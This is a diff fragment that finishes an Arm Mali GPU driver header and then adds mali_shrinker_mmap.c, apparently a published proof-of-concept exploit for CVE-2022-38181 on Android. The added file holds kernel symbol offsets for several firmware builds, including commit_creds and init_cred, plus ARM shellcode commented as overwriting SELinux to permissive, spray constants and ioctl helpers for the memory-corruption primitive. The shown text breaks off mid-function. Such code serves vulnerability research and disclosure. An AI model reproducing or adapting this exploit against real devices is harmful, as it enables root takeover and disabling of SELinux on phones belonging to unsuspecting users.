base_jd_fragment { + __u64 norm_read_norm_write; + __u64 norm_read_forced_write; + __u64 forced_read_forced_write; + __u64 forced_read_norm_write; +}; + +/** + * typedef base_jd_prio - Base Atom priority. + * + * Only certain priority levels are actually implemented, as specified by the + * BASE_JD_PRIO_<...> definitions below. It is undefined to use a priority + * level that is not one of those defined below. + * + * Priority levels only affect scheduling after the atoms have had dependencies + * resolved. For example, a low priority atom that has had its dependencies + * resolved might run before a higher priority atom that has not had its + * dependencies resolved. + * + * In general, fragment atoms do not affect non-fragment atoms with + * lower priorities, and vice versa. One exception is that there is only one + * priority value for each context. So a high-priority (e.g.) fragment atom + * could increase its context priority, causing its non-fragment atoms to also + * be scheduled sooner. + * + * The atoms are scheduled as follows with respect to their priorities: + * * Let atoms 'X' and 'Y' be for the same job slot who have dependencies + * resolved, and atom 'X' has a higher priority than atom 'Y' + * * If atom 'Y' is currently running on the HW, then it is interrupted to + * allow atom 'X' to run soon after + * * If instead neither atom 'Y' nor atom 'X' are running, then when choosing + * the next atom to run, atom 'X' will always be chosen instead of atom 'Y' + * * Any two atoms that have the same priority could run in any order with + * respect to each other. That is, there is no ordering constraint between + * atoms of the same priority. + * + * The sysfs file 'js_ctx_scheduling_mode' is used to control how atoms are + * scheduled between contexts. The default value, 0, will cause higher-priority + * atoms to be scheduled first, regardless of their context. The value 1 will + * use a round-robin algorithm when deciding which context's atoms to schedule + * next, so higher-priority atoms can only preempt lower priority atoms within + * the same context. See KBASE_JS_SYSTEM_PRIORITY_MODE and + * KBASE_JS_PROCESS_LOCAL_PRIORITY_MODE for more details. + */ +typedef __u8 base_jd_prio; + +/* Medium atom priority. This is a priority higher than BASE_JD_PRIO_LOW */ +#define BASE_JD_PRIO_MEDIUM ((base_jd_prio)0) +/* High atom priority. This is a priority higher than BASE_JD_PRIO_MEDIUM and + * BASE_JD_PRIO_LOW + */ +#define BASE_JD_PRIO_HIGH ((base_jd_prio)1) +/* Low atom priority. */ +#define BASE_JD_PRIO_LOW ((base_jd_prio)2) +/* Real-Time atom priority. This is a priority higher than BASE_JD_PRIO_HIGH, + * BASE_JD_PRIO_MEDIUM, and BASE_JD_PRIO_LOW + */ +#define BASE_JD_PRIO_REALTIME ((base_jd_prio)3) + +/* Count of the number of priority levels. This itself is not a valid + * base_jd_prio setting + */ +#define BASE_JD_NR_PRIO_LEVELS 4 + +/** + * struct base_jd_atom_v2 - Node of a dependency graph used to submit a + * GPU job chain or soft-job to the kernel driver. + * + * @jc: GPU address of a job chain or (if BASE_JD_REQ_END_RENDERPASS + * is set in the base_jd_core_req) the CPU address of a + * base_jd_fragment object. + * @udata: User data. + * @extres_list: List of external resources. + * @nr_extres: Number of external resources or JIT allocations. + * @jit_id: Zero-terminated array of IDs of just-in-time memory + * allocations written to by the atom. When the atom + * completes, the value stored at the + * &struct_base_jit_alloc_info.heap_info_gpu_addr of + * each allocation is read in order to enforce an + * overall physical memory usage limit. + * @pre_dep: Pre-dependencies. One need to use SETTER function to assign + * this field; this is done in order to reduce possibility of + * improper assignment of a dependency field. + * @atom_number: Unique number to identify the atom. + * @prio: Atom priority. Refer to base_jd_prio for more details. + * @device_nr: Core group when BASE_JD_REQ_SPECIFIC_COHERENT_GROUP + * specified. + * @jobslot: Job slot to use when BASE_JD_REQ_JOB_SLOT is specified. + * @core_req: Core requirements. + * @renderpass_id: Renderpass identifier used to associate an atom that has + * BASE_JD_REQ_START_RENDERPASS set in its core requirements + * with an atom that has BASE_JD_REQ_END_RENDERPASS set. + * @padding: Unused. Must be zero. + * + * This structure has changed since UK 10.2 for which base_jd_core_req was a + * __u16 value. + * + * In UK 10.3 a core_req field of a __u32 type was added to the end of the + * structure, and the place in the structure previously occupied by __u16 + * core_req was kept but renamed to compat_core_req. + * + * From UK 11.20 - compat_core_req is now occupied by __u8 jit_id[2]. + * Compatibility with UK 10.x from UK 11.y is not handled because + * the major version increase prevents this. + * + * For UK 11.20 jit_id[2] must be initialized to zero. + */ +struct base_jd_atom_v2 { + __u64 jc; + struct base_jd_udata udata; + __u64 extres_list; + __u16 nr_extres; + __u8 jit_id[2]; + struct base_dependency pre_dep[2]; + base_atom_id atom_number; + base_jd_prio prio; + __u8 device_nr; + __u8 jobslot; + base_jd_core_req core_req; + __u8 renderpass_id; + __u8 padding[7]; +}; + +/** + * struct base_jd_atom - Same as base_jd_atom_v2, but has an extra seq_nr + * at the beginning. + * + * @seq_nr: Sequence number of logical grouping of atoms. + * @jc: GPU address of a job chain or (if BASE_JD_REQ_END_RENDERPASS + * is set in the base_jd_core_req) the CPU address of a + * base_jd_fragment object. + * @udata: User data. + * @extres_list: List of external resources. + * @nr_extres: Number of external resources or JIT allocations. + * @jit_id: Zero-terminated array of IDs of just-in-time memory + * allocations written to by the atom. When the atom + * completes, the value stored at the + * &struct_base_jit_alloc_info.heap_info_gpu_addr of + * each allocation is read in order to enforce an + * overall physical memory usage limit. + * @pre_dep: Pre-dependencies. One need to use SETTER function to assign + * this field; this is done in order to reduce possibility of + * improper assignment of a dependency field. + * @atom_number: Unique number to identify the atom. + * @prio: Atom priority. Refer to base_jd_prio for more details. + * @device_nr: Core group when BASE_JD_REQ_SPECIFIC_COHERENT_GROUP + * specified. + * @jobslot: Job slot to use when BASE_JD_REQ_JOB_SLOT is specified. + * @core_req: Core requirements. + * @renderpass_id: Renderpass identifier used to associate an atom that has + * BASE_JD_REQ_START_RENDERPASS set in its core requirements + * with an atom that has BASE_JD_REQ_END_RENDERPASS set. + * @padding: Unused. Must be zero. + */ +typedef struct base_jd_atom { + __u64 seq_nr; + __u64 jc; + struct base_jd_udata udata; + __u64 extres_list; + __u16 nr_extres; + __u8 jit_id[2]; + struct base_dependency pre_dep[2]; + base_atom_id atom_number; + base_jd_prio prio; + __u8 device_nr; + __u8 jobslot; + base_jd_core_req core_req; + __u8 renderpass_id; + __u8 padding[7]; +} base_jd_atom; + +struct base_jit_alloc_info { + __u64 gpu_alloc_addr; + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u8 id; + __u8 bin_id; + __u8 max_allocations; + __u8 flags; + __u8 padding[2]; + __u16 usage_id; + __u64 heap_info_gpu_addr; +}; + +/* Job chain event code bits + * Defines the bits used to create ::base_jd_event_code + */ +enum { + BASE_JD_SW_EVENT_KERNEL = (1u << 15), /* Kernel side event */ + BASE_JD_SW_EVENT = (1u << 14), /* SW defined event */ + /* Event indicates success (SW events only) */ + BASE_JD_SW_EVENT_SUCCESS = (1u << 13), + BASE_JD_SW_EVENT_JOB = (0u << 11), /* Job related event */ + BASE_JD_SW_EVENT_BAG = (1u << 11), /* Bag related event */ + BASE_JD_SW_EVENT_INFO = (2u << 11), /* Misc/info event */ + BASE_JD_SW_EVENT_RESERVED = (3u << 11), /* Reserved event type */ + /* Mask to extract the type from an event code */ + BASE_JD_SW_EVENT_TYPE_MASK = (3u << 11) +}; + +/** + * enum base_jd_event_code - Job chain event codes + * + * @BASE_JD_EVENT_RANGE_HW_NONFAULT_START: Start of hardware non-fault status + * codes. + * Obscurely, BASE_JD_EVENT_TERMINATED + * indicates a real fault, because the + * job was hard-stopped. + * @BASE_JD_EVENT_NOT_STARTED: Can't be seen by userspace, treated as + * 'previous job done'. + * @BASE_JD_EVENT_STOPPED: Can't be seen by userspace, becomes + * TERMINATED, DONE or JOB_CANCELLED. + * @BASE_JD_EVENT_TERMINATED: This is actually a fault status code - the job + * was hard stopped. + * @BASE_JD_EVENT_ACTIVE: Can't be seen by userspace, jobs only returned on + * complete/fail/cancel. + * @BASE_JD_EVENT_RANGE_HW_NONFAULT_END: End of hardware non-fault status codes. + * Obscurely, BASE_JD_EVENT_TERMINATED + * indicates a real fault, + * because the job was hard-stopped. + * @BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_START: Start of hardware fault and + * software error status codes. + * @BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_END: End of hardware fault and + * software error status codes. + * @BASE_JD_EVENT_RANGE_SW_SUCCESS_START: Start of software success status + * codes. + * @BASE_JD_EVENT_RANGE_SW_SUCCESS_END: End of software success status codes. + * @BASE_JD_EVENT_RANGE_KERNEL_ONLY_START: Start of kernel-only status codes. + * Such codes are never returned to + * user-space. + * @BASE_JD_EVENT_RANGE_KERNEL_ONLY_END: End of kernel-only status codes. + * @BASE_JD_EVENT_DONE: atom has completed successfull + * @BASE_JD_EVENT_JOB_CONFIG_FAULT: Atom dependencies configuration error which + * shall result in a failed atom + * @BASE_JD_EVENT_JOB_POWER_FAULT: The job could not be executed because the + * part of the memory system required to access + * job descriptors was not powered on + * @BASE_JD_EVENT_JOB_READ_FAULT: Reading a job descriptor into the Job + * manager failed + * @BASE_JD_EVENT_JOB_WRITE_FAULT: Writing a job descriptor from the Job + * manager failed + * @BASE_JD_EVENT_JOB_AFFINITY_FAULT: The job could not be executed because the + * specified affinity mask does not intersect + * any available cores + * @BASE_JD_EVENT_JOB_BUS_FAULT: A bus access failed while executing a job + * @BASE_JD_EVENT_INSTR_INVALID_PC: A shader instruction with an illegal program + * counter was executed. + * @BASE_JD_EVENT_INSTR_INVALID_ENC: A shader instruction with an illegal + * encoding was executed. + * @BASE_JD_EVENT_INSTR_TYPE_MISMATCH: A shader instruction was executed where + * the instruction encoding did not match the + * instruction type encoded in the program + * counter. + * @BASE_JD_EVENT_INSTR_OPERAND_FAULT: A shader instruction was executed that + * contained invalid combinations of operands. + * @BASE_JD_EVENT_INSTR_TLS_FAULT: A shader instruction was executed that tried + * to access the thread local storage section + * of another thread. + * @BASE_JD_EVENT_INSTR_ALIGN_FAULT: A shader instruction was executed that + * tried to do an unsupported unaligned memory + * access. + * @BASE_JD_EVENT_INSTR_BARRIER_FAULT: A shader instruction was executed that + * failed to complete an instruction barrier. + * @BASE_JD_EVENT_DATA_INVALID_FAULT: Any data structure read as part of the job + * contains invalid combinations of data. + * @BASE_JD_EVENT_TILE_RANGE_FAULT: Tile or fragment shading was asked to + * process a tile that is entirely outside the + * bounding box of the frame. + * @BASE_JD_EVENT_STATE_FAULT: Matches ADDR_RANGE_FAULT. A virtual address + * has been found that exceeds the virtual + * address range. + * @BASE_JD_EVENT_OUT_OF_MEMORY: The tiler ran out of memory when executing a job. + * @BASE_JD_EVENT_UNKNOWN: If multiple jobs in a job chain fail, only + * the first one the reports an error will set + * and return full error information. + * Subsequent failing jobs will not update the + * error status registers, and may write an + * error status of UNKNOWN. + * @BASE_JD_EVENT_DELAYED_BUS_FAULT: The GPU received a bus fault for access to + * physical memory where the original virtual + * address is no longer available. + * @BASE_JD_EVENT_SHAREABILITY_FAULT: Matches GPU_SHAREABILITY_FAULT. A cache + * has detected that the same line has been + * accessed as both shareable and non-shareable + * memory from inside the GPU. + * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL1: A memory access hit an invalid table + * entry at level 1 of the translation table. + * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL2: A memory access hit an invalid table + * entry at level 2 of the translation table. + * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL3: A memory access hit an invalid table + * entry at level 3 of the translation table. + * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL4: A memory access hit an invalid table + * entry at level 4 of the translation table. + * @BASE_JD_EVENT_PERMISSION_FAULT: A memory access could not be allowed due to + * the permission flags set in translation + * table + * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL1: A bus fault occurred while reading + * level 0 of the translation tables. + * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL2: A bus fault occurred while reading + * level 1 of the translation tables. + * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL3: A bus fault occurred while reading + * level 2 of the translation tables. + * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL4: A bus fault occurred while reading + * level 3 of the translation tables. + * @BASE_JD_EVENT_ACCESS_FLAG: Matches ACCESS_FLAG_0. A memory access hit a + * translation table entry with the ACCESS_FLAG + * bit set to zero in level 0 of the + * page table, and the DISABLE_AF_FAULT flag + * was not set. + * @BASE_JD_EVENT_MEM_GROWTH_FAILED: raised for JIT_ALLOC atoms that failed to + * grow memory on demand + * @BASE_JD_EVENT_JOB_CANCELLED: raised when this atom was hard-stopped or its + * dependencies failed + * @BASE_JD_EVENT_JOB_INVALID: raised for many reasons, including invalid data + * in the atom which overlaps with + * BASE_JD_EVENT_JOB_CONFIG_FAULT, or if the + * platform doesn't support the feature specified in + * the atom. + * @BASE_JD_EVENT_PM_EVENT: TODO: remove as it's not used + * @BASE_JD_EVENT_TIMED_OUT: TODO: remove as it's not used + * @BASE_JD_EVENT_BAG_INVALID: TODO: remove as it's not used + * @BASE_JD_EVENT_PROGRESS_REPORT: TODO: remove as it's not used + * @BASE_JD_EVENT_BAG_DONE: TODO: remove as it's not used + * @BASE_JD_EVENT_DRV_TERMINATED: this is a special event generated to indicate + * to userspace that the KBase context has been + * destroyed and Base should stop listening for + * further events + * @BASE_JD_EVENT_REMOVED_FROM_NEXT: raised when an atom that was configured in + * the GPU has to be retried (but it has not + * started) due to e.g., GPU reset + * @BASE_JD_EVENT_END_RP_DONE: this is used for incremental rendering to signal + * the completion of a renderpass. This value + * shouldn't be returned to userspace but I haven't + * seen where it is reset back to JD_EVENT_DONE. + * + * HW and low-level SW events are represented by event codes. + * The status of jobs which succeeded are also represented by + * an event code (see @BASE_JD_EVENT_DONE). + * Events are usually reported as part of a &struct base_jd_event. + * + * The event codes are encoded in the following way: + * * 10:0 - subtype + * * 12:11 - type + * * 13 - SW success (only valid if the SW bit is set) + * * 14 - SW event (HW event if not set) + * * 15 - Kernel event (should never be seen in userspace) + * + * Events are split up into ranges as follows: + * * BASE_JD_EVENT_RANGE__START + * * BASE_JD_EVENT_RANGE__END + * + * code is in 's range when: + * BASE_JD_EVENT_RANGE__START <= code < + * BASE_JD_EVENT_RANGE__END + * + * Ranges can be asserted for adjacency by testing that the END of the previous + * is equal to the START of the next. This is useful for optimizing some tests + * for range. + * + * A limitation is that the last member of this enum must explicitly be handled + * (with an assert-unreachable statement) in switch statements that use + * variables of this type. Otherwise, the compiler warns that we have not + * handled that enum value. + */ +enum base_jd_event_code { + /* HW defined exceptions */ + BASE_JD_EVENT_RANGE_HW_NONFAULT_START = 0, + + /* non-fatal exceptions */ + BASE_JD_EVENT_NOT_STARTED = 0x00, + BASE_JD_EVENT_DONE = 0x01, + BASE_JD_EVENT_STOPPED = 0x03, + BASE_JD_EVENT_TERMINATED = 0x04, + BASE_JD_EVENT_ACTIVE = 0x08, + + BASE_JD_EVENT_RANGE_HW_NONFAULT_END = 0x40, + BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_START = 0x40, + + /* job exceptions */ + BASE_JD_EVENT_JOB_CONFIG_FAULT = 0x40, + BASE_JD_EVENT_JOB_POWER_FAULT = 0x41, + BASE_JD_EVENT_JOB_READ_FAULT = 0x42, + BASE_JD_EVENT_JOB_WRITE_FAULT = 0x43, + BASE_JD_EVENT_JOB_AFFINITY_FAULT = 0x44, + BASE_JD_EVENT_JOB_BUS_FAULT = 0x48, + BASE_JD_EVENT_INSTR_INVALID_PC = 0x50, + BASE_JD_EVENT_INSTR_INVALID_ENC = 0x51, + BASE_JD_EVENT_INSTR_TYPE_MISMATCH = 0x52, + BASE_JD_EVENT_INSTR_OPERAND_FAULT = 0x53, + BASE_JD_EVENT_INSTR_TLS_FAULT = 0x54, + BASE_JD_EVENT_INSTR_BARRIER_FAULT = 0x55, + BASE_JD_EVENT_INSTR_ALIGN_FAULT = 0x56, + BASE_JD_EVENT_DATA_INVALID_FAULT = 0x58, + BASE_JD_EVENT_TILE_RANGE_FAULT = 0x59, + BASE_JD_EVENT_STATE_FAULT = 0x5A, + BASE_JD_EVENT_OUT_OF_MEMORY = 0x60, + BASE_JD_EVENT_UNKNOWN = 0x7F, + + /* GPU exceptions */ + BASE_JD_EVENT_DELAYED_BUS_FAULT = 0x80, + BASE_JD_EVENT_SHAREABILITY_FAULT = 0x88, + + /* MMU exceptions */ + BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL1 = 0xC1, + BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL2 = 0xC2, + BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL3 = 0xC3, + BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL4 = 0xC4, + BASE_JD_EVENT_PERMISSION_FAULT = 0xC8, + BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL1 = 0xD1, + BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL2 = 0xD2, + BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL3 = 0xD3, + BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL4 = 0xD4, + BASE_JD_EVENT_ACCESS_FLAG = 0xD8, + + /* SW defined exceptions */ + BASE_JD_EVENT_MEM_GROWTH_FAILED = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x000, + BASE_JD_EVENT_TIMED_OUT = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x001, + BASE_JD_EVENT_JOB_CANCELLED = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x002, + BASE_JD_EVENT_JOB_INVALID = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x003, + BASE_JD_EVENT_PM_EVENT = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x004, + + BASE_JD_EVENT_BAG_INVALID = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_BAG | 0x003, + + BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_END = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_RESERVED | 0x3FF, + + BASE_JD_EVENT_RANGE_SW_SUCCESS_START = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_SUCCESS | 0x000, + + BASE_JD_EVENT_PROGRESS_REPORT = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_JOB | 0x000, + BASE_JD_EVENT_BAG_DONE = BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_SUCCESS | + BASE_JD_SW_EVENT_BAG | 0x000, + BASE_JD_EVENT_DRV_TERMINATED = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_INFO | 0x000, + + BASE_JD_EVENT_RANGE_SW_SUCCESS_END = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_RESERVED | 0x3FF, + + BASE_JD_EVENT_RANGE_KERNEL_ONLY_START = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_KERNEL | 0x000, + BASE_JD_EVENT_REMOVED_FROM_NEXT = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_JOB | 0x000, + BASE_JD_EVENT_END_RP_DONE = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_JOB | 0x001, + + BASE_JD_EVENT_RANGE_KERNEL_ONLY_END = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_RESERVED | 0x3FF +}; + +/** + * struct base_jd_event_v2 - Event reporting structure + * + * @event_code: event code. + * @atom_number: the atom number that has completed. + * @udata: user data. + * + * This structure is used by the kernel driver to report information + * about GPU events. They can either be HW-specific events or low-level + * SW events, such as job-chain completion. + * + * The event code contains an event type field which can be extracted + * by ANDing with BASE_JD_SW_EVENT_TYPE_MASK. + */ +struct base_jd_event_v2 { + enum base_jd_event_code event_code; + base_atom_id atom_number; + struct base_jd_udata udata; +}; + +/** + * struct base_dump_cpu_gpu_counters - Structure for + * BASE_JD_REQ_SOFT_DUMP_CPU_GPU_COUNTERS + * jobs. + * @system_time: gpu timestamp + * @cycle_counter: gpu cycle count + * @sec: cpu time(sec) + * @usec: cpu time(usec) + * @padding: padding + * + * This structure is stored into the memory pointed to by the @jc field + * of &struct base_jd_atom. + * + * It must not occupy the same CPU cache line(s) as any neighboring data. + * This is to avoid cases where access to pages containing the structure + * is shared between cached and un-cached memory regions, which would + * cause memory corruption. + */ + +struct base_dump_cpu_gpu_counters { + __u64 system_time; + __u64 cycle_counter; + __u64 sec; + __u32 usec; + __u8 padding[36]; +}; + +#endif /* _UAPI_BASE_JM_KERNEL_H_ */ + diff --git a/SecurityExploits/Android/Mali/CVE_2022_38181/mali_shrinker_mmap.c b/SecurityExploits/Android/Mali/CVE_2022_38181/mali_shrinker_mmap.c new file mode 100644 index 0000000..5cf4aef --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2022_38181/mali_shrinker_mmap.c @@ -0,0 +1,796 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "stdbool.h" +#include +#include + +#include "mali.h" +#include "mali_base_jm_kernel.h" +#include "midgard.h" + +#ifdef SHELL +#define LOG(fmt, ...) printf(fmt, ##__VA_ARGS__) +#else +#include +#define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__) + +#endif //SHELL + +#define MALI "/dev/mali0" + +#define PAGE_SHIFT 12 + +#define BASE_MEM_ALIAS_MAX_ENTS ((size_t)24576) + +#define PFN_DOWN(x) ((x) >> PAGE_SHIFT) + +#define SPRAY_PAGES 25 + +#define SPRAY_NUM 64 + +#define FLUSH_SIZE (0x1000 * 0x1000) + +#define SPRAY_CPU 0 + +#define POOL_SIZE 16384 + +#define RESERVED_SIZE 32 + +#define TOTAL_RESERVED_SIZE 1024 + +#define FLUSH_REGION_SIZE 500 + +#define NUM_TRIALS 100 + +#define KERNEL_BASE 0x80000000 + +#define OVERWRITE_INDEX 256 + +#define ADRP_INIT_INDEX 0 + +#define ADD_INIT_INDEX 1 + +#define ADRP_COMMIT_INDEX 2 + +#define ADD_COMMIT_INDEX 3 + +#define AVC_DENY_2108 0x92df1c + +#define SEL_READ_ENFORCE_2108 0x942ae4 + +#define INIT_CRED_2108 0x29a0570 + +#define COMMIT_CREDS_2108 0x180b0c + +#define ADD_INIT_2108 0x9115c000 + +#define ADD_COMMIT_2108 0x912c3108 + +#define AVC_DENY_2201 0x930af4 + +#define SEL_READ_ENFORCE_2201 0x9456bc + +#define INIT_CRED_2201 0x29b0570 + +#define COMMIT_CREDS_2201 0x183df0 + +#define ADD_INIT_2201 0x9115c000 + +#define ADD_COMMIT_2201 0x9137c108 + +#define AVC_DENY_2202 0x930b50 + +#define SEL_READ_ENFORCE_2202 0x94551c + +#define INIT_CRED_2202 0x29b0570 + +#define COMMIT_CREDS_2202 0x183e3c + +#define ADD_INIT_2202 0x9115c000 //add x0, x0, #0x570 + +#define ADD_COMMIT_2202 0x9138f108 //add x8, x8, #0xe3c + +#define AVC_DENY_2207 0x927664 + +#define SEL_READ_ENFORCE_2207 0x93bf5c + +#define INIT_CRED_2207 0x29e07f0 + +#define COMMIT_CREDS_2207 0x18629c + +#define ADD_INIT_2207 0x911fc000 //add x0, x0, #0x7f0 + +#define ADD_COMMIT_2207 0x910a7108 //add x8, x8, #0x29c + +#define AVC_DENY_2211 0x8d6810 + +#define SEL_READ_ENFORCE_2211 0x8ea124 + +#define INIT_CRED_2211 0x2fd1388 + +#define COMMIT_CREDS_2211 0x17ada4 + +#define ADD_INIT_2211 0x910e2000 //add x0, x0, #0x388 + +#define ADD_COMMIT_2211 0x91369108 //add x8, x8, #0xda4 + +#define AVC_DENY_2212 0x8ba710 + +#define SEL_READ_ENFORCE_2212 0x8cdfd4 + +#define INIT_CRED_2212 0x2fd1418 + +#define COMMIT_CREDS_2212 0x177ee4 + +#define ADD_INIT_2212 0x91106000 //add x0, x0, #0x418 + +#define ADD_COMMIT_2212 0x913b9108 //add x8, x8, #0xee4 + + +static uint64_t sel_read_enforce = SEL_READ_ENFORCE_2207; + +static uint64_t avc_deny = AVC_DENY_2207; + +/* +Overwriting SELinux to permissive + strb wzr, [x0] + mov x0, #0 + ret +*/ +static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0}; + +static uint32_t root_code[8] = {0}; + +static uint8_t jit_id = 1; +static uint8_t atom_number = 1; +static uint64_t gpu_va[SPRAY_NUM] = {0}; +static int gpu_va_idx = 0; +static void* flush_regions[FLUSH_REGION_SIZE]; +static void* alias_regions[SPRAY_NUM] = {0}; +static uint64_t reserved[TOTAL_RESERVED_SIZE/RESERVED_SIZE]; + + +struct base_mem_handle { + struct { + __u64 handle; + } basep; +}; + +struct base_mem_aliasing_info { + struct base_mem_handle handle; + __u64 offset; + __u64 length; +}; + +static int open_dev(char* name) { + int fd = open(name, O_RDWR); + if (fd == -1) { + err(1, "cannot open %s\n", name); + } + return fd; +} + +void setup_mali(int fd, int group_id) { + struct kbase_ioctl_version_check param = {0}; + if (ioctl(fd, KBASE_IOCTL_VERSION_CHECK, ¶m) < 0) { + err(1, "version check failed\n"); + } + struct kbase_ioctl_set_flags set_flags = {group_id << 3}; + if (ioctl(fd, KBASE_IOCTL_SET_FLAGS, &set_flags) < 0) { + err(1, "set flags failed\n"); + } +} + +void* setup_tracking_page(int fd) { + void* region = mmap(NULL, 0x1000, 0, MAP_SHARED, fd, BASE_MEM_MAP_TRACKING_HANDLE); + if (region == MAP_FAILED) { + err(1, "setup tracking page failed"); + } + return region; +} + +void jit_init(int fd, uint64_t va_pages, uint64_t trim_level, int group_id) { + struct kbase_ioctl_mem_jit_init init = {0}; + init.va_pages = va_pages; + init.max_allocations = 255; + init.trim_level = trim_level; + init.group_id = group_id; + init.phys_pages = va_pages; + + if (ioctl(fd, KBASE_IOCTL_MEM_JIT_INIT, &init) < 0) { + err(1, "jit init failed\n"); + } +} + +uint64_t jit_allocate(int fd, uint8_t atom_number, uint8_t id, uint64_t va_pages, uint64_t gpu_alloc_addr) { + struct base_jit_alloc_info info = {0}; + struct base_jd_atom_v2 atom = {0}; + + info.id = id; + info.gpu_alloc_addr = gpu_alloc_addr; + info.va_pages = va_pages; + info.commit_pages = va_pages; + info.extension = 0x1000; + + atom.jc = (uint64_t)(&info); + atom.atom_number = atom_number; + atom.core_req = BASE_JD_REQ_SOFT_JIT_ALLOC; + atom.nr_extres = 1; + struct kbase_ioctl_job_submit submit = {0}; + submit.addr = (uint64_t)(&atom); + submit.nr_atoms = 1; + submit.stride = sizeof(struct base_jd_atom_v2); + if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) { + err(1, "submit job failed\n"); + } + return *((uint64_t*)gpu_alloc_addr); +} + +void jit_free(int fd, uint8_t atom_number, uint8_t id) { + uint8_t free_id = id; + + struct base_jd_atom_v2 atom = {0}; + + atom.jc = (uint64_t)(&free_id); + atom.atom_number = atom_number; + atom.core_req = BASE_JD_REQ_SOFT_JIT_FREE; + atom.nr_extres = 1; + struct kbase_ioctl_job_submit submit = {0}; + submit.addr = (uint64_t)(&atom); + submit.nr_atoms = 1; + submit.stride = sizeof(struct base_jd_atom_v2); + if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) { + err(1, "submit job failed\n"); + } + +} + +void mem_flags_change(int fd, uint64_t gpu_addr, uint32_t flags, int ignore_results) { + struct kbase_ioctl_mem_flags_change change = {0}; + change.flags = flags; + change.gpu_va = gpu_addr; + change.mask = flags; + if (ignore_results) { + ioctl(fd, KBASE_IOCTL_MEM_FLAGS_CHANGE, &change); + return; + } + if (ioctl(fd, KBASE_IOCTL_MEM_FLAGS_CHANGE, &change) < 0) { + err(1, "flags_change failed\n"); + } +} + +void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc) { + if (ioctl(fd, KBASE_IOCTL_MEM_ALLOC, alloc) < 0) { + err(1, "mem_alloc failed\n"); + } +} + +void mem_alias(int fd, union kbase_ioctl_mem_alias* alias) { + if (ioctl(fd, KBASE_IOCTL_MEM_ALIAS, alias) < 0) { + err(1, "mem_alias failed\n"); + } +} + +void mem_query(int fd, union kbase_ioctl_mem_query* query) { + if (ioctl(fd, KBASE_IOCTL_MEM_QUERY, query) < 0) { + err(1, "mem_query failed\n"); + } +} + +void mem_commit(int fd, uint64_t gpu_addr, uint64_t pages) { + struct kbase_ioctl_mem_commit commit = {.gpu_addr = gpu_addr, pages = pages}; + if (ioctl(fd, KBASE_IOCTL_MEM_COMMIT, &commit) < 0) { + err(1, "mem_commit failed\n"); + } +} + +void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (group << 22); + int prot = PROT_READ; + if (!read_only) { + alloc.in.flags |= BASE_MEM_PROT_GPU_WR; + prot |= PROT_WRITE; + } + alloc.in.va_pages = va_pages; + alloc.in.commit_pages = commit_pages; + mem_alloc(mali_fd, &alloc); + void* region = mmap(NULL, 0x1000 * va_pages, prot, MAP_SHARED, mali_fd, alloc.out.gpu_va); + if (region == MAP_FAILED) { + err(1, "mmap failed"); + } + return region; +} + +uint64_t alloc_mem(int mali_fd, unsigned int pages) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR; + int prot = PROT_READ | PROT_WRITE; + alloc.in.va_pages = pages; + alloc.in.commit_pages = pages; + mem_alloc(mali_fd, &alloc); + return alloc.out.gpu_va; +} + +void free_mem(int mali_fd, uint64_t gpuaddr) { + struct kbase_ioctl_mem_free mem_free = 